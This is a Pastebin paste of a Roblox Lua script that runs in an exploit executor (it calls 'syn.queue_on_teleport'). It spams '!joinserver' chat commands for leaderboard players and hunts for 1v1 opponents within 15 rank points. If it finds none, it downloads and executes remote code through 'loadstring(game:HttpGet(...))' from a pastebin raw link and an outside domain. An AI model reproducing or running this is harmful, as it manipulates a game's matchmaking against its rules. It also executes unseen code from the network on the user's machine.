GO0GL3_CHR0M3

findhighelo

Apr 9th, 2022 (edited)
369
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.58 KB | None | 0 0
  1.  
  2. local players = game.Players;
  3. local replicatedStorage = game:GetService('ReplicatedStorage');
  4.  
  5. local player = players.LocalPlayer;
  6. local playerGui = player.PlayerGui;
  7. local menu = playerGui:WaitForChild('ScreenGui');
  8.  
  9. local chatRemote = replicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest;
  10.  
  11. wait(3);
  12.  
  13. local leaderboard = menu['lb1']:GetChildren();
  14.  
  15. if #leaderboard >= 1 then
  16. local amount = math.clamp(#leaderboard, 1, 10);
  17.  
  18. for i=1, amount do
  19. local lbPlayer = leaderboard[i];
  20. chatRemote:FireServer(string.format('!joinserver %s', lbPlayer.Name), 'all');
  21. end
  22. end
  23.  
  24. local leaderstats = player:WaitForChild('leaderstats');
  25. local rankValue = leaderstats:WaitForChild('1v1 Rank');
  26. local myPoints = rankValue.Value;
  27.  
  28. local found;
  29.  
  30. for i, v in next, players:GetPlayers() do
  31. if v ~= player then
  32. if not v:FindFirstChild('leaderstats') then continue end;
  33. local rankPoints = v.leaderstats['1v1 Rank'].Value
  34.  
  35. if math.abs(myPoints - rankPoints) <= 15 and v.Team == '1v1s' then
  36. found = true;
  37. end
  38. end
  39. end
  40.  
  41. if found then
  42. local sound = Instance.new('Sound', menu);
  43. sound.SoundId = 'rbxassetid://7265006559';
  44. sound.Volume = 4;
  45. sound:Play();
  46.  
  47. local placeRemote = replicatedStorage:WaitForChild('Place');
  48. placeRemote:FireServer(true); -- Queue for 1s
  49.  
  50. else
  51.  
  52. syn.queue_on_teleport("loadstring(game:HttpGet('https://pastebin.com/raw/PbZhtddy', true))()")
  53.  
  54. loadstring(game:HttpGet('https://ic3w0lf.xyz/rblx/OWw9sYMYbyHr6GvPI87UvORyPr2U274X.lua', true))();
  55.  
  56. end
  57.  
Add Comment
Please, Sign In to add comment